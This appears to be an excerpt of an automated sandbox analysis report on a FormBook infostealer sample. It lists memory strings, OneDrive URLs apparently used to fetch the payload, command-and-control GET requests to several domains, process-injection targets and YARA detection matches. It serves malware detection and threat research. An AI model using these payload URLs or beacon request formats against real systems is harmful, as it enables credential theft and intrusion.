              Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/e
              Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/t
              Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/w
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/
              Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4m4gdZgN9vpD5zAE34F6nOBodS76VsiZvQO69itA_Kz97aCmsmB5p4T1sYe5ZzwMe6
              Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVlfZP7
              Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4mWheWVd_ulVA7I3cjlifsQ_hjAjUwAiOhs_rGTjyEnBf6dISBKjP9LuUpM-ahNhLD
              Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4mb0GM36UMcQfEUiMpLP03Y8bvo9LtwS-BqKbXqgBYhMdWptkR9dr4YpWcIo8Dgkas
              Source: Telragab.PIF, 00000009.00000002.2579759920.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD9ztd
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4mkyT3e9ftNlbXtjIFcL8z3YMEEbeJfXibBwh-99Rm7Ot1eMTdDYyDRGAjFrO7mgVv
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com/y4mu7B-5fk8szYFW7t5U8GAGFWHz18vQ3lOohdWuW1sD9KC1dexn3z8c44A7Y_qMtHF
              Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVl
              Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mWheWVd_ulVA7I3cjlifsQ_hjAjUwAiOhs_rGTjyEnBf6dISBKjP9LuUpM-ah
              Source: Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.000000000087C000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2319332034.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mu7B-5fk8szYFW7t5U8GAGFWHz18vQ3lOohdWuW1sD9KC1dexn3z8c44A7Y_q
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000869000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000866000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?r
              Source: Telragab.PIF, 0000000B.00000002.2688655343.0000000002B85000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=D2FF5C6240820574%21465&authkey=
              Source: explorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
              Source: explorer.exe, 00000005.00000002.4629484500.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
              Source: explorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.leathfortexas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.optimusvisionlb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.maltsky.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.thnkotb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.harmonicod.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.kermisbedrijfkramer.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.stellarskyline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.hivaom.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 30 Nov 2023 13:57:23 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 30 Nov 2023 13:58:44 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "6552b21e-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Nov 2023 13:59:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: Yara matchFile source: Process Memory Space: Fpopgapwdcgvxn.exe PID: 2268, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032EF158 GetMessagePos,GetKeyboardState,0_2_032EF158
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032D4F94 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,0_2_032D4F94

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
